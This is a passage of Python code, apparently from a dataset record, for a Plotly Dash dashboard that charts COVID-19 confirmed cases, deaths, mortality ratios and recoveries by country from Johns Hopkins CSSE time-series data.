in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Cases Double Every 3 Days'], hovertemplate=\n '<b>Cases Double Every 3 Days</b>', showlegend=True))\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Cases Double Every 7 Days'], hovertemplate=\n '<b>Cases Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title':\n 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10\n (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log',\n 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black',\n 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': \n False}, title='Overall Confirmed Cases', xaxis={'title':\n 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[\n 'Days Since 1000 Cases'].max()], 'fixedrange': True,\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig1000, 'layout': layout_global}\n return fig_global\n elif select_global == 'Global Deaths Trend':\n fig100 = []\n anno = []\n for group, dataframe in deaths_100_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 100 Deaths'])\n trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di\n ['Deaths'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np\n .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y',\n 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'\n ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align':\n 'center', 'font': {'size': 8, 'color': 'black'},\n 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1,\n 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig100.append(trace)\n anno.append(a)\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Deaths Double Every 3 Days'], hovertemplate=\n '<b>Deaths Double Every 3 Days</b>', showlegend=True))\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Deaths Double Every 7 Days'], hovertemplate=\n '<b>Deaths Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Deaths',\n 'range': [np.log10(100), np.log10(cases_1000_start['Deaths'].\n max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': \n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, title='Overall Deaths',\n xaxis={'title': 'Days Since First 100 deaths', 'range': [0,\n deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':\n True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig100, 'layout': layout_global}\n return fig_global\n elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)':\n figmort = []\n anno = []\n m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)\n m = m.sort_values(by=['Mortality_Percent'], ascending=True\n ).reset_index()\n for i in range(len(m)):\n m1 = m.loc[i, 'Country_Region']\n m2 = m.loc[i, 'Mortality_Percent']\n trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2],\n y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)],\n orientation='h', textposition='auto', marker=dict(color=\n '#FFB000', opacity=0.6, line=dict(color=\n 'rgba(255,176,0, 1)', width=1)), hovertemplate=\n '<b>%{y}</b><br>' +\n '<br>Observed Case Mortaility Pct: %{text}&#37;<br>',\n showlegend=False)\n figmort.append(trace)\n layout_global = go.Layout(yaxis={'title': 'Country / Region',\n 'fixedrange': True, 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Observed Case - Mortality Ratio', xaxis={'title':\n '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [\n 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=750, hovermode='closest')\n fig_global = {'data': figmort, 'layout': layout_global}\n return fig_global\n elif select_global == 'Recoveries vs. Deaths By Country':\n figscat = []\n rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100)\n ].reset_index()\n for i in range(len(rc)):\n scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i,\n 'Recovered']], mode='markers+text', text=[rc.loc[i,\n 'Country_Region']], marker_color=colors_dict_global[rc.loc[\n i, 'Continent']], showlegend=False, marker=dict(size=12,\n line_width=1, opacity=0.75), hovertemplate=\n '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' +\n 'Deaths: %{x}<br>', textposition='bottom center', textfont=\n dict(size=10, color='rgba(0, 0, 0, 0.6)'))\n figscat.append(scat)\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(),\n 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25,\n line=dict(color='grey', width=1), text=[\n '# of Deaths = # of Recoveries'], hovertemplate=\n '<b># of Deaths = # of Recoveries</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Recoveries for Every Death',\n opacity=0.25, line=dict(color='green', width=3, dash='dash'),\n text=['2 Recoveries for Every Death'], hovertemplate=\n '<b>2 Recoveries for Every Death</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Deaths for Every Recovery',\n opacity=0.25, line=dict(color='firebrick', width=3, dash='dash'\n ), text=['2 Deaths for Every Recovery'], hovertemplate=\n '<b>2 Deaths for Every Recovery</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Recoveries',\n 'fixedrange': True, 'automargin': True, 'range': [np.log10(100),\n np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log',\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'dtick': 1, 'showline': True, 'mirror': False}, title=\n 'Recoveries vs. Deaths, By Country', xaxis={'title':\n 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100),\n np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth':\n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, height=750, hovermode='closest'\n )\n fig_global = {'data': figscat, 'layout': layout_global}\n return fig_global\n\n\n@app.callback([Output(component_id='main-dropdown-2', component_property=\n 'options'), Output(component_id='btext1', component_property='children'\n ), Output(component_id='subplot1', component_property='figure'), Output\n (component_id='btext2', component_property='children'), Output(\n component_id='subplot2', component_property='figure'), Output(\n component_id='btext3', component_property='children'), Output(\n component_id='subplot3', component_property='figure')], [Input(\n component_id='main-dropdown', component_property='value')])\ndef update_country(selected_country):\n if selected_country is None:\n selected_country = 'Canada'\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n else:\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n\n\n@app.callback(Output(component_id='box-1', component_property='figure'), [\n Input(component_id='main-dropdown', component_property='value'), Input(\n component_id='main-dropdown-2', component_property='value')])\ndef update_maingraph(selected_country, selected_graph):\n if selected_graph is None and selected_country is None:\n selected_country = 'Canada'\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph is None and selected_country is not None:\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph == 'Total and Daily Confirmed Cases':\n figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode=\n 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode=\n 'lines', fill='tozeroy')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n else:\n cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F',\n 'Recovered': '#009E73'}\n figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Date'], y=final_df.loc[final_df['Country_Region'] ==\n selected_country, selected_graph], marker_color=cols_dict[\n selected_graph])]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n selected_graph].max() * 1.1], 'automargin': True, 'showline': \n True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'},\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n\n\nif __name__ == '__main__':\n app.run_server()\n", "step-4": "<mask token>\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import date\nfrom COVID19_Diff import calc_diff_country\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport plotly.graph_objects as go\nimport math\nurls = [\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv'\n ,\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv'\n ,\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv'\n ]\nfinal_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv')\nfinal_df = calc_diff_country(final_df)\nfinal_df['Date'] = pd.to_datetime(final_df['Date'])\nfinal_df['Country_Region'] = final_df['Country_Region'].astype(str)\ncases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df\n ['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[\n 'Date']\ncases_1000_start = cases_1000_start.reset_index()\ncases_1000_start = cases_1000_start.rename(columns={'Date': 'Start_Date'})\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\ncases_1000_start = pd.merge(cases_1000_start, final_df, on=[\n 'Country_Region'], how='right')\ncases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date'])\ncases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date'])\ncases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()]\ncases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] -\n cases_1000_start['Start_Date']).dt.days\ndeaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df[\n 'Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()[\n 'Date']\ndeaths_100_start = deaths_100_start.reset_index()\ndeaths_100_start = deaths_100_start.rename(columns={'Date': 'Start_Date'})\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\ndeaths_100_start = pd.merge(deaths_100_start, final_df, on=[\n 'Country_Region'], how='right')\ndeaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date'])\ndeaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date'])\ndeaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()]\ndeaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] -\n deaths_100_start['Start_Date']).dt.days\nmort = final_df.groupby(['Country_Region'])['Date'].max().reset_index()\nmort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left')\nmort['Mortality_Percent'] = mort['Deaths'] / mort['Confirmed'] * 100.0\ncolors_dict_global = {'Europe': '#1D6996', 'Asia': '#CC503E', 'Africa':\n '#94346E', 'North America': '#38A6A5', 'Middle East': '#EDAD08',\n 'South America': '#E17C05', 'Caribbean & Central America': '#0F8554',\n 'Oceania': '#73AF48'}\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\nserver = app.server\napp.layout = html.Div(children=[html.H2(children='COVID-19 Dashboard'),\n html.H4(children=\n 'A Basic Dashboard to Help Track the COVID-19 Pandemic'), html.Br(),\n html.H5(children='Global View'), html.P(children=\n 'The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. The Global View includes the following:'\n ), html.Div([html.Ul([html.Li([html.B(\n 'Cumulative Cases by Country Since First 1000 Cases: '),\n 'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis'\n ]), html.Li([html.B(\n 'Cumulative Cases by Country Since First 100 Deaths: '),\n 'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis'\n ]), html.Li([html.B(\n 'Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): '\n ),\n 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'\n ]), html.Li([html.B(\n 'Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: '\n ),\n 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'\n ])])], style={'font-size': 12}), html.Br(), dcc.Dropdown(id=\n 'global-dropdown', options=[{'label': y, 'value': y} for y in [\n 'Global Cases Trend', 'Global Deaths Trend',\n '% Mortality by Confirmed Cases (Top 20 Countries)',\n 'Recoveries vs. Deaths By Country']], placeholder=\n 'Pick Graphs From Here...'), dcc.Graph(id='global-box-1'), html.Br(),\n html.H5(children='Country View'), html.P(\n 'The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. The Country View includes the following:'\n ), html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B\n ('Confirmed: '),\n 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']),\n html.Li([html.B('Recovered: '),\n 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']),\n html.Li([html.B('Deaths: '),\n 'Cumulative Deaths from COVID-19 since January 22nd, 2020']), html.Li([\n html.B('Total and Daily Confirmed Cases: '),\n 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country'\n ])])]), dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value':\n x} for x in list(final_df.Country_Region.unique())], placeholder=\n 'Pick a Country From Here...'), dcc.Dropdown(id='main-dropdown-2',\n placeholder='Pick Graphs From Here...'), dcc.Graph(id='box-1'), html.\n Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id=\n 'btext1'), dcc.Graph(id='subplot1')], className='four columns', style={\n 'color': '#648FFF'}), html.Div([html.H6(children=\n 'Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id=\n 'subplot2')], className='four columns', style={'color': '#DC267F'}),\n html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id=\n 'btext3'), dcc.Graph(id='subplot3')], className='four columns', style={\n 'color': '#009E73', 'layout': 'right'})], className='row')])\n\n\n@app.callback(Output(component_id='global-box-1', component_property=\n 'figure'), [Input(component_id='global-dropdown', component_property=\n 'value')])\ndef global_update(select_global):\n if select_global == 'Global Cases Trend' or select_global is None:\n fig1000 = []\n anno = []\n for group, dataframe in cases_1000_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 1000 Cases'])\n trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di\n ['Confirmed'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np\n .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref':\n 'y', 'showarrow': False, 'text': list(di.loc[:,\n 'Country_Region'])[0], 'xanchor': 'right', 'yanchor':\n 'middle', 'align': 'center', 'font': {'size': 8, 'color':\n 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1,\n 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig1000.append(trace)\n anno.append(a)\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Cases Double Every 3 Days'], hovertemplate=\n '<b>Cases Double Every 3 Days</b>', showlegend=True))\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Cases Double Every 7 Days'], hovertemplate=\n '<b>Cases Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title':\n 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10\n (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log',\n 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black',\n 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': \n False}, title='Overall Confirmed Cases', xaxis={'title':\n 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[\n 'Days Since 1000 Cases'].max()], 'fixedrange': True,\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig1000, 'layout': layout_global}\n return fig_global\n elif select_global == 'Global Deaths Trend':\n fig100 = []\n anno = []\n for group, dataframe in deaths_100_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 100 Deaths'])\n trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di\n ['Deaths'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np\n .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y',\n 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'\n ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align':\n 'center', 'font': {'size': 8, 'color': 'black'},\n 'bordercolor': '#ffffff', 'borderwidth': 1, 